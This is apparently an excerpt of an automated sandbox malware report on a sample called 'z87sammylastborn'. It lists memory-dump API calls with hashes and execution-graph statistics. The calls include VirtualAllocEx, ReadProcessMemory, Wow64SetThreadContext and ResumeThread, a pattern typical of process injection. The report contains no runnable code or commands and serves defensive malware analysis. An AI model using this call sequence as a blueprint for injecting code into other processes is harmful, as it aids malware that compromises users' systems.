                                                                                        • Source File: 00000000.00000002.2085374836.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6c50000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentThread
                                                                                        • String ID:
                                                                                        • API String ID: 2882836952-0
                                                                                        • Opcode ID: c8dcc96cded171f38d32bc55db2240c0f66aba5e437b27c741bd4e4900f8274f
                                                                                        • Instruction ID: 1f09a9faab021b90583a2889197f8bc84c12902ef916ebde138974d82d3c6c54
                                                                                        • Opcode Fuzzy Hash: c8dcc96cded171f38d32bc55db2240c0f66aba5e437b27c741bd4e4900f8274f
                                                                                        • Instruction Fuzzy Hash: C42159B59002598FCB04DF99C944B9EFBF4FF49304F148569D419A7351C338A984CFA5
                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05079F76
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: 89f68514829d045f70235c5070014cfade84738fc402267e9e3abc976b740235
                                                                                        • Instruction ID: 53d138cde2ce38d6832524995e2e1a357c41abff4c9fc624a2da785b77d52f91
                                                                                        • Opcode Fuzzy Hash: 89f68514829d045f70235c5070014cfade84738fc402267e9e3abc976b740235
                                                                                        • Instruction Fuzzy Hash: 6C2138B1D042098FDB50DFAAC4857EEBBF4EF88310F108429D419A7240CB789945CFA4
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0507A200
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: 2e8025788ef735a9dce1a3b3654e6847442cc8b312451b026f1c74bece10132a
                                                                                        • Instruction ID: b24a78d6456d30219feb83552bc1454e0908443bf8fab6c4c3587f9143ab4f11
                                                                                        • Opcode Fuzzy Hash: 2e8025788ef735a9dce1a3b3654e6847442cc8b312451b026f1c74bece10132a
                                                                                        • Instruction Fuzzy Hash: 682107B1D003499FCB10DFAAC885AEEFBF5FF48310F50842AE919A7250C7799944CBA5
                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05079F76
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: f4de4003805a2a4b03ee766c38c90e88f746d118d3ef682d6183a5ffdbe73ab8
                                                                                        • Instruction ID: cd41d6face5715d7f22e81d22a876851fcbb9acb35da0e7a8b4da72119d8a3ab
                                                                                        • Opcode Fuzzy Hash: f4de4003805a2a4b03ee766c38c90e88f746d118d3ef682d6183a5ffdbe73ab8
                                                                                        • Instruction Fuzzy Hash: E02118B1D043098FDB50DFAAC4857EEBBF4EF88310F548429D519A7240CB789944CFA4
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 06C52052
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085374836.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6c50000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentThread
                                                                                        • String ID:
                                                                                        • API String ID: 2882836952-0
                                                                                        • Opcode ID: ef02eb939d2893d6dd66b20790c3e2afc51bcac03c88b3dfeaa4a1ac2cd3bed7
                                                                                        • Instruction ID: f51c2d9bf8f95cb4e7df02d4071306a778df39b81cc78063efcaafaed889f2ec
                                                                                        • Opcode Fuzzy Hash: ef02eb939d2893d6dd66b20790c3e2afc51bcac03c88b3dfeaa4a1ac2cd3bed7
                                                                                        • Instruction Fuzzy Hash: AB2146B490024A8FCB10DF9AD844B9EFBF4FF88314F148569D419A7351C378A984CFA5
                                                                                        APIs
                                                                                        • EnumThreadWindows.USER32(?,00000000,059AD49E,?,?,?,00000E20,?,?,06C520A0,03AA4108,02AEF360), ref: 06C52131
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085374836.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6c50000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnumThreadWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2941952884-0
                                                                                        • Opcode ID: 13e73517526644d06fae0d3ecf6327b93e35b905e56bc62c0937ae6ab361c778
                                                                                        • Instruction ID: 1e4d1d0269ae0bba928d39eae0f6f4ed1e86ced9fcb22dda0744194dc7bc49c3
                                                                                        • Opcode Fuzzy Hash: 13e73517526644d06fae0d3ecf6327b93e35b905e56bc62c0937ae6ab361c778
                                                                                        • Instruction Fuzzy Hash: 432107B1D042098FDB54DF9AC844BAFFBF5EB88310F14842AD914A3250D778AA44CFA4
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CAD80F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2082103434.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ca0000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: f7974f5ba3e391e5bde36bd518b56e0c7f572da9cfc2e96f578231ebf50a74d7
                                                                                        • Instruction ID: 5c6a0556bf9c99c6788b887bc816b0720f25cfd708fd67aea918903448d4de75
                                                                                        • Opcode Fuzzy Hash: f7974f5ba3e391e5bde36bd518b56e0c7f572da9cfc2e96f578231ebf50a74d7
                                                                                        • Instruction Fuzzy Hash: 5A21C4B5D002499FDB10CFAAD984ADEBFF9FB49310F14841AE919A3350D378A944CFA5
                                                                                        APIs
                                                                                        • EnumThreadWindows.USER32(?,00000000,059AD49E,?,?,?,00000E20,?,?,06C520A0,03AA4108,02AEF360), ref: 06C52131
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085374836.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6c50000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnumThreadWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2941952884-0
                                                                                        • Opcode ID: 4ebebb377974d85de0885a6afd1f121ed581d05e608173d702c668218c4653d1
                                                                                        • Instruction ID: 0800ab21d1234c739849ec73dc36de21e714a7e3c34331ffe443659406d3b7e7
                                                                                        • Opcode Fuzzy Hash: 4ebebb377974d85de0885a6afd1f121ed581d05e608173d702c668218c4653d1
                                                                                        • Instruction Fuzzy Hash: 8721F7B5D002098FDB54CFAAC944BEEFBF5EB88310F14842AD559A3250D778AA45CFA4
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04FA1EE2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2084764830.0000000004FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_4fa0000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 716092398-0
                                                                                        • Opcode ID: 6ad1e66e31b09d0bdfdef3268f71ef133d05d008304f4bff1c087402426ff048
                                                                                        • Instruction ID: f59bc0406b040020dc0f2ff87e7f154b85b1170f376d57011b55865b15a406ef
                                                                                        • Opcode Fuzzy Hash: 6ad1e66e31b09d0bdfdef3268f71ef133d05d008304f4bff1c087402426ff048
                                                                                        • Instruction Fuzzy Hash: 3321F4B5C10248EFEF11DF98C984BDEBBB5BB08318F158109E804AB260CB75A855DFA0
                                                                                        APIs
                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 050760DA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: TextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 530164218-0
                                                                                        • Opcode ID: f83017d975172bd828af721fbeba4f802f931acae5e1c32fc3a7c3dea04576d1
                                                                                        • Instruction ID: 442e14698b2a85d520499f14570719e68338670906a1e22e42c690db0f0b95de
                                                                                        • Opcode Fuzzy Hash: f83017d975172bd828af721fbeba4f802f931acae5e1c32fc3a7c3dea04576d1
                                                                                        • Instruction Fuzzy Hash: 1111F2B2C006098FDB14CF9AD444BDEFBF4EB88310F10802AD859A7240D379A54ACFA5
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0507A03E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 9569ed8344b502301ee847b442fb19e2d3944575990b0c382ff815d15d8aa4c8
                                                                                        • Instruction ID: 28151b42be24306dd3f553af2670c867911ae8d88bf6fe5becee3abbfbc01195
                                                                                        • Opcode Fuzzy Hash: 9569ed8344b502301ee847b442fb19e2d3944575990b0c382ff815d15d8aa4c8
                                                                                        • Instruction Fuzzy Hash: 391114B1D002499FCB10DFAAD844AEEBFF5FF88320F148819E519A7250C7799944CBA0
                                                                                        APIs
                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 050760DA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: TextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 530164218-0
                                                                                        • Opcode ID: 0275ec4fb53c48225dd775eb18a460f666e215fba6677fc670c370f3efead857
                                                                                        • Instruction ID: d35a03bcbd93ab9455065f4d129b414e186c65c140b6d730be4adfaf73cada73
                                                                                        • Opcode Fuzzy Hash: 0275ec4fb53c48225dd775eb18a460f666e215fba6677fc670c370f3efead857
                                                                                        • Instruction Fuzzy Hash: C01112B2C006098FDB10CF9AD844BDEFBF8FB88320F10802AD859A3240D339A545CFA5
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0507A03E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 85101b8b321c15e6782fbdcd4b11c53d2eb05c36fbe938c162e8e7598d18397c
                                                                                        • Instruction ID: 1c1fa87fdd9c279dbc2c69a6566f2a804088d3980677b7405bb827ec5dd92e81
                                                                                        • Opcode Fuzzy Hash: 85101b8b321c15e6782fbdcd4b11c53d2eb05c36fbe938c162e8e7598d18397c
                                                                                        • Instruction Fuzzy Hash: 291114719002499FCB10DFAAC844AEEBFF5EF88320F108819E519A7250C779A944CBA4
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 73bd5e809cf301a84d1f63660f83ad11ed6334e05bd7f2ab353c40ad020ee49f
                                                                                        • Instruction ID: 01f9d09ed382b6fb647eb8d7d0faa86103d5f7c5f6c12c6cb0ce4d3fac57dafd
                                                                                        • Opcode Fuzzy Hash: 73bd5e809cf301a84d1f63660f83ad11ed6334e05bd7f2ab353c40ad020ee49f
                                                                                        • Instruction Fuzzy Hash: E71125B1D002498FCB20DFAAD4457AEFBF5EF88320F208819D519A7250CB79A944CBA4
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 5c2e582b939236ac4c1eb7f0e5a7c80fb2c0b2f4cb8f9561c54e9b1ce911b54e
                                                                                        • Instruction ID: 57efbbf38d4cb0ec6b18db18cba19d9057fa7366dc3b02aacfdfae1e277c5ede
                                                                                        • Opcode Fuzzy Hash: 5c2e582b939236ac4c1eb7f0e5a7c80fb2c0b2f4cb8f9561c54e9b1ce911b54e
                                                                                        • Instruction Fuzzy Hash: FA113AB1D002498FCB10DFAAC4457AFFBF5EF88320F108419D519A7250CB79A944CBA4
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,00000018,00000001,?), ref: 05076605
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        • Opcode ID: e78c8ee7f61a465a2191575b988d92f1f88d94d6934755e0b005e73aed64d89d
                                                                                        • Instruction ID: e2122b7f1ba5b2c76ec75048810196999c0ee1a7f8cd8ef11492932bb98e6116
                                                                                        • Opcode Fuzzy Hash: e78c8ee7f61a465a2191575b988d92f1f88d94d6934755e0b005e73aed64d89d
                                                                                        • Instruction Fuzzy Hash: AE11F2B58047499FDB10DF9AD544BEEBFF8FB48310F108419E519A7200C379A944CFA9
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00CAB4FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2082103434.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ca0000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: d9b83d9044e12fbdde72099c02c9175cf5788f716eea32bcba76de89cf45b786
                                                                                        • Instruction ID: 01d0fd6965024baf320f1a43b0a3a583420e14ebfbf8564fa9144c58da5594ec
                                                                                        • Opcode Fuzzy Hash: d9b83d9044e12fbdde72099c02c9175cf5788f716eea32bcba76de89cf45b786
                                                                                        • Instruction Fuzzy Hash: 3A11F2B5C007498FCB10DF9AD444ADEFBF8EF89314F14842AD429A7211D379AA45CFA5
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,00000018,00000001,?), ref: 05076605
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        • Opcode ID: c563bdab80cf66532220408768acd8296c1650b3c4c35c0df7f6d44f39aceda5
                                                                                        • Instruction ID: e857cefddc56df09469e7033c043b765dfae31add7fc8e167cad62ece9ec6702
                                                                                        • Opcode Fuzzy Hash: c563bdab80cf66532220408768acd8296c1650b3c4c35c0df7f6d44f39aceda5
                                                                                        • Instruction Fuzzy Hash: 1411E0B5C006499FCB10DF99D484BDEBFF8EB49320F208419D569A7240C379A944CFA5
                                                                                        APIs
                                                                                        • SetWindowLongW.USER32(?,?,?), ref: 04FA2075
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2084764830.0000000004FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_4fa0000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1378638983-0
                                                                                        • Opcode ID: c2d265a8ee77905118d326d75f3554ba8de3fb0665e4d38941ceefc32492b528
                                                                                        • Instruction ID: 11e82eea9a3107be795d3d9971d52972bb4adff9bea13a421bf9bd645f8ac54a
                                                                                        • Opcode Fuzzy Hash: c2d265a8ee77905118d326d75f3554ba8de3fb0665e4d38941ceefc32492b528
                                                                                        • Instruction Fuzzy Hash: 4C1112B58002498FDB10DF9AC484BDFFBF8EB88320F20845AD918A3300C379A944CFA5
                                                                                        APIs
                                                                                        • SetWindowLongW.USER32(?,?,?), ref: 04FA2075
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2084764830.0000000004FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_4fa0000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1378638983-0
                                                                                        • Opcode ID: 18bb7d3f6c5fa38798793dff6c5fd4e780e518122af1540866008264bdd59329
                                                                                        • Instruction ID: 11f1e296839b666f04f83b4cac396aa6ac91dd588da8e4fec32d79c856e87bb3
                                                                                        • Opcode Fuzzy Hash: 18bb7d3f6c5fa38798793dff6c5fd4e780e518122af1540866008264bdd59329
                                                                                        • Instruction Fuzzy Hash: D61106B58002498FDB10CF99D485BEEBFF4EB48310F108459D558A3300C375A944CFA1
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085374836.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6c50000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: Initialize
                                                                                        • String ID:
                                                                                        • API String ID: 2538663250-0
                                                                                        • Opcode ID: 2e1874d6399ccc1e8b618a5dd94434c985907d581ee4dff2d975fba77343b5b3
                                                                                        • Instruction ID: 4b36140fe141c28dc50c7b60766b798303c72fe949be59640d2b20157adf90f0
                                                                                        • Opcode Fuzzy Hash: 2e1874d6399ccc1e8b618a5dd94434c985907d581ee4dff2d975fba77343b5b3
                                                                                        • Instruction Fuzzy Hash: 951112B5C007488FCB10DFAAC549BDEBBF8AB48314F24845AD518A7700D338A584CFA4
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085374836.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6c50000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: Initialize
                                                                                        • String ID:
                                                                                        • API String ID: 2538663250-0
                                                                                        • Opcode ID: 7c0808a51aeaceae34ca61817a856267ebfaa146270c05db778b0d98a95a5364
                                                                                        • Instruction ID: f634c927789f1e32533b785c05d7c6ea31c0c31c4013553199d9560bc38347ff
                                                                                        • Opcode Fuzzy Hash: 7c0808a51aeaceae34ca61817a856267ebfaa146270c05db778b0d98a95a5364
                                                                                        • Instruction Fuzzy Hash: 9711E2B58007498FCB20DFAAD948B9EBBF8EB49324F248459D518A7610C379A584CFA5
                                                                                        APIs
                                                                                        • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,05072129,?,?), ref: 050722D0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2962429428-0
                                                                                        • Opcode ID: 5c6cbd20f954c7b368437094379557869694a16f6ed21e79b47ac99f9fd99ae3
                                                                                        • Instruction ID: 7b02d6fd3d30d2687ba2aaf9314952099f30c9be556786fb0bd71e066609bfb6
                                                                                        • Opcode Fuzzy Hash: 5c6cbd20f954c7b368437094379557869694a16f6ed21e79b47ac99f9fd99ae3
                                                                                        • Instruction Fuzzy Hash: 7C2189B5C083899FCB10DFA9D4447EEBFF4EF49320F14845AD598A7242C338A544CBA9
                                                                                        APIs
                                                                                        • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,05072129,?,?), ref: 050722D0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2962429428-0
                                                                                        • Opcode ID: 2d07c81fd4e01c9505c5a971f20ea9c201f3507e3ec910712b25bffae727c912
                                                                                        • Instruction ID: b00ac7ece1de3555de9854ab5b39cf6092ba929a4e8087e74c968b939ef6fad8
                                                                                        • Opcode Fuzzy Hash: 2d07c81fd4e01c9505c5a971f20ea9c201f3507e3ec910712b25bffae727c912
                                                                                        • Instruction Fuzzy Hash: 721125B5C002499FDB10DFA9D485BDEBFF4EB48320F108429D558A7640C338A545CFA5
                                                                                        APIs
                                                                                        • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,05072129,?,?), ref: 050722D0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2085007203.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5070000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2962429428-0
                                                                                        • Opcode ID: 3eae22370cd16e6cce5fb3a24210f18231cc5b500f3ea843ca504b80e9fb8a6d
                                                                                        • Instruction ID: 337be56d575d098e30ef34ec281ac34949c880b1410113136e5ce4e021d72331
                                                                                        • Opcode Fuzzy Hash: 3eae22370cd16e6cce5fb3a24210f18231cc5b500f3ea843ca504b80e9fb8a6d
                                                                                        • Instruction Fuzzy Hash: D41125B5C046499FCB20DF9AD544BEEBBF4FB48320F108419D958A7340D738A944CFA9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2084764830.0000000004FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_4fa0000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7c5b73ad217f482c7ef94e6812d378b6a651aa877d645961f5c1ca9297c84068
                                                                                        • Instruction ID: 417ff71de61ba8cd3e6574d63e7227bb4b4b1ddea1ea06de0c12a05a09e91069
                                                                                        • Opcode Fuzzy Hash: 7c5b73ad217f482c7ef94e6812d378b6a651aa877d645961f5c1ca9297c84068
                                                                                        • Instruction Fuzzy Hash: E71261B040174A8ED730EF65ED4D1893AB1BB653A8B504309D2E16A2FDDBBE154BCF44
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2082103434.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ca0000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c6976bb6218e87d473cc5a15fca7da654ef512b5b30d7459a464b7d34cac9154
                                                                                        • Instruction ID: e988138c23dec482d6be2154e2bf73ec4eda191989bdb1ccc49abd648a54e68d
                                                                                        • Opcode Fuzzy Hash: c6976bb6218e87d473cc5a15fca7da654ef512b5b30d7459a464b7d34cac9154
                                                                                        • Instruction Fuzzy Hash: F1A19F32E002168FCF15DFB4C88459EB7B2FF86304B14457AE906AB266DB75ED16DB80
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2084764830.0000000004FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_4fa0000_z87sammylastborn.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 799f5948016b02d6923a178bd7aabb5328326e39a20fef96817324bb05cfa737
                                                                                        • Instruction ID: 860b17dec2ee38510d280ebeba1aec6a2080de2ef39a403a7ec1d6c1e3b9fc45
                                                                                        • Opcode Fuzzy Hash: 799f5948016b02d6923a178bd7aabb5328326e39a20fef96817324bb05cfa737
                                                                                        • Instruction Fuzzy Hash: 2FC1D2B080174A8ED730EF65ED481897BB1BBA53A4F504319D1A16B2FCDBBA158BCF44

                                                                                        Execution Graph

                                                                                        Execution Coverage:13.6%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:8.3%
                                                                                        Total number of Nodes:48
                                                                                        Total number of Limit Nodes:4
                                                                                        execution_graph 17546 2a4cab0 17547 2a4cadd 17546->17547 17549 2a4e9bf 17547->17549 17551 2a4cde6 17547->17551 17552 2a4c168 17547->17552 17550 2a4c168 LdrInitializeThunk 17550->17551 17551->17549 17551->17550 17553 2a4c17a 17552->17553 17554 2a4c17f 17552->17554 17553->17551 17554->17553 17555 2a4c8a9 LdrInitializeThunk 17554->17555 17555->17553 17556 2a446d8 17557 2a446e4 17556->17557 17560 2a448c9 17557->17560 17558 2a44713 17561 2a448e4 17560->17561 17568 2a44ef8 17561->17568 17574 2a44f08 17561->17574 17562 2a448f0 17580 50d15f8 17562->17580 17586 50d15ea 17562->17586 17563 2a4491a 17563->17558 17569 2a44f2a 17568->17569 17570 2a44ff6 17569->17570 17572 2a4c168 LdrInitializeThunk 17569->17572 17592 2a4c76c 17569->17592 17598 2a4c158 17569->17598 17570->17562 17572->17570 17575 2a44f2a 17574->17575 17576 2a44ff6 17575->17576 17577 2a4c76c 2 API calls 17575->17577 17578 2a4c168 LdrInitializeThunk 17575->17578 17579 2a4c158 2 API calls 17575->17579 17576->17562 17577->17576 17578->17576 17579->17576 17581 50d161a 17580->17581 17582 50d172c 17581->17582 17583 2a4c76c 2 API calls 17581->17583 17584 2a4c168 LdrInitializeThunk 17581->17584 17585 2a4c158 2 API calls 17581->17585 17582->17563 17583->17582 17584->17582 17585->17582 17587 50d161a 17586->17587 17588 50d172c 17587->17588 17589 2a4c76c 2 API calls 17587->17589 17590 2a4c168 LdrInitializeThunk 17587->17590 17591 2a4c158 2 API calls 17587->17591 17588->17563 17589->17588 17590->17588 17591->17588 17596 2a4c623 17592->17596 17593 2a4c764 LdrInitializeThunk 17595 2a4c8c1 17593->17595 17595->17570 17596->17593 17597 2a4c168 LdrInitializeThunk 17596->17597 17597->17596 17599 2a4c17a 17598->17599 17600 2a4c17f 17598->17600 17599->17570 